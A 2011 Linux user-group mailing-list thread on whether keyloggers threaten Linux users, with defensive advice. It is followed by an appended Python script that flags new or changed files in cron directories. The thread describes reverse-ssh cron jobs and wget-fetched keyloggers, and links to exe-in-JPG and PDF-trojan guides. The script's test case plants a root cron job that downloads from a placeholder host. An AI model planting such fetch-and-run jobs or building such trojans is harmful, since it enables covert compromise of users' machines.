Linux & key Loggers

Lisa Kachold lisakachold at obnosis.com
Thu Jun 30 16:16:27 MST 2011


Mike:

More to make the post complete with all available attack vectors that could
be deployed to install a keylogger on Linux (MAC and Windows):

On Thu, Jun 30, 2011 at 2:09 PM, mike enriquez <mylinux at cox.net> wrote:

> On 06/30/2011 06:55 AM, Lisa Kachold wrote:
>
> Hi Mike!
>
> On Wed, Jun 29, 2011 at 5:09 PM, mike enriquez <mylinux at cox.net> wrote:
>
>> Does anyone on the List know if Key Loggers are a problem in Linux?
>> I don't know a thing about them.  My windows computers get the things all
>> the time.
>> Do I need to worry about them in Linux.
>> Thanks for any comments.
>>
>
> Unlike Windows, where the attack vector is mainly viruses from file
> transfers, in Linux (and Mac) the attack vector is going to be browser
> based.
>
> So if you don't limit javascript trust, you can fall victim to any manner
> of installations, ssh, or infestations from browser based attacks like
> BeEF <http://linux.softpedia.com/get/Internet/HTTP-WWW-/BeEF-29854.shtml>.
> This tool will provide a triangulated Host --> Website --> YourBrowser
> attack similar to XSS scripting browser attacks, that opens your entire
> linux (or Mac) system to full control via the Browser (Opera/FireFox/etc).
> A keylogger like the one referenced by Sam would trivially be installed
> without your immediate knowledge.
>
> Of course if you do not properly firewall your home network, have a "cable
> modem" that is subject to hacked firmware, or take your laptop to public
> venues without a proper analysis of open ports or iptables, you can always
> pick up a "hitcher", who could install a key logger or other hack.
>
> Various hardware hacks also exist, similar to tiny USB devices that can be
> set up on your keyboard or monitor between connections, which are commonly
> used by IT managers in NOCs and Operations Centers (where oblivious
> Operations and Systems staff continue to surf Facebook rather than actually
> work).
>
> Regularly reading the logs, setting up reporting devices that inform of new
> files or packages and of course watching packet traffic by port on a regular
> basis will assist you to identify keyloggers, as well as BeEF and XSS
> browser hacks, since you will clearly see a great deal of nefarious
> traffic.
>
> Of course if you allow 3rd Party Cookies and don't control Javascript, you
> are just laying on a large number of "adware" and other installations that
> create traffic.  Be sure you use NoScript or another Javascript trust
> control plugin at the browser level.
>
> It is recommended that ANY systems user always have a fairly realistic
> understanding of network trust, packet ports and "regular traffic".
>
> Also, beyond KEYLOGGERS, everyone needs to know that EVERY SINGLE SITE YOU
> GOOGLE, every place you visit can trivially be cross referenced from other
> sites for which you authenticate to provide AT A GLANCE NSA and DHS data
> that will provide a complete profile.  This includes CHAT LOGS, Warez sites,
> TORRENT, and porn sites.
> The false sense of security that you can use an Anonymizer or browser Proxy
> site, while it will allow you to get to FaceBook from work, will not protect
> you from large scale data taps at the level of Akamai Caching and
> Cable/Telecom providers which can be configured to hit any number of
> parameters for which the feds are interested.
>
>
> Also, if you download FULL email messages, including PDF attachments,
(which you open without updating your Adobe Browser Plugin or other
applications for all known exploits) and JPEGs (executable files which I can
trivially [bind to an .exe file for Win7 powershell fun] or include Unicode
UTF or BOM characters that can and will set up cron jobs (to open a reverse
ssh session to my hacked server at a certain time of night for instance) or
wget a keylogger [since this is the subject we are discussing here in this
PLUG post] when "opened") you are opening new attack vectors for Linux (or
even specifically addressed to you by an associate) [an excellent reason to
obfuscate your "real identity" at 2600 Club meetings....].

References:

http://xahlee.org/comp/unicode_BOM_byte_orde_mark.html
http://www.hackingethics.com/blog/2008/07/22/how-to-convert-exe-files-to-jpg/
http://justhackitnow.blogspot.com/2011/02/hide-multiple-files-into-single-jpg.html
http://www.dirtyservices.com/2010/how-to-create-adobe-acrobat-pdf-exploit-trojan/

>
>> Mike Enriquez
>> ---------------------------------------------------
>> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
>> To subscribe, unsubscribe, or to change your mail settings:
>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>>
>
>
>
> --
> (602) 791-8002  Android
> (623) 239-3392 Skype
> (623) 688-3392 Google Voice
> HomeSmartInternational.com <http://www.homesmartinternational.com>
>
>  Thank you Lisa,
> I love this group.
> Every time I ask a question I get an education.
> Take Care.
> Mike



-- 
(602) 791-8002  Android
(623) 239-3392 Skype
(623) 688-3392 Google Voice
HomeSmartInternational.com <http://www.homesmartinternational.com>
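Lisa's advice above (a reporting device that informs you of new files, and watching for dropped cron jobs) can be turned into a small baseline-and-diff check. This is an added example, not code from the thread or from any tool mentioned in it; the watched directories and the demo scenario are assumptions chosen to match the cron-job vector she describes.

```python
"""Baseline-and-diff check for Linux autostart locations such as cron dirs.

Added example (not from the PLUG thread). Record a snapshot once, re-run it
later, and report any file that appeared, vanished or changed. The default
list is an assumption covering the usual cron drop-in paths.
"""
import hashlib
import os
import tempfile
from pathlib import Path

# Assumed watch list: places a dropped cron job would typically land.
DEFAULT_WATCHED = ["/etc/cron.d", "/etc/cron.daily", "/etc/cron.hourly",
                   "/etc/cron.weekly", "/var/spool/cron"]

def _sha256(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def snapshot(dirs) -> dict:
    """Map every regular file under the watched dirs to its hash and mode."""
    result = {}
    for d in dirs:
        for root, _, files in os.walk(d):          # missing dirs are skipped
            for name in files:
                p = Path(root, name)
                if p.is_symlink() or not p.is_file():
                    continue                          # only real files count
                result[str(p)] = {"sha256": _sha256(p),
                                  "mode": p.stat().st_mode & 0o777}
    return result

def diff_snapshots(old: dict, new: dict) -> dict:
    """Paths added, removed, or whose content/permissions changed."""
    changed = [p for p in set(old) & set(new) if old[p] != new[p]]
    return {"added": sorted(set(new) - set(old)),
            "removed": sorted(set(old) - set(new)),
            "changed": sorted(changed)}

def demo() -> dict:
    """Constructed scenario: a cron dir gains one job and one gets edited."""
    with tempfile.TemporaryDirectory() as tmp:
        cron_d = Path(tmp, "cron.d"); cron_d.mkdir()
        (cron_d / "logrotate").write_text("0 3 * * * root /usr/sbin/logrotate\n")
        before = snapshot([str(cron_d)])
        (cron_d / "logrotate").write_text("0 3 * * * root /tmp/.x/run\n")
        (cron_d / "update").write_text("*/5 * * * * root wget -q http://example.invalid/k\n")
        report = diff_snapshots(before, snapshot([str(cron_d)]))
    return {k: [Path(p).name for p in v] for k, v in report.items()}

if __name__ == "__main__":
    print(demo())   # run snapshot(DEFAULT_WATCHED) from cron for the real thing
```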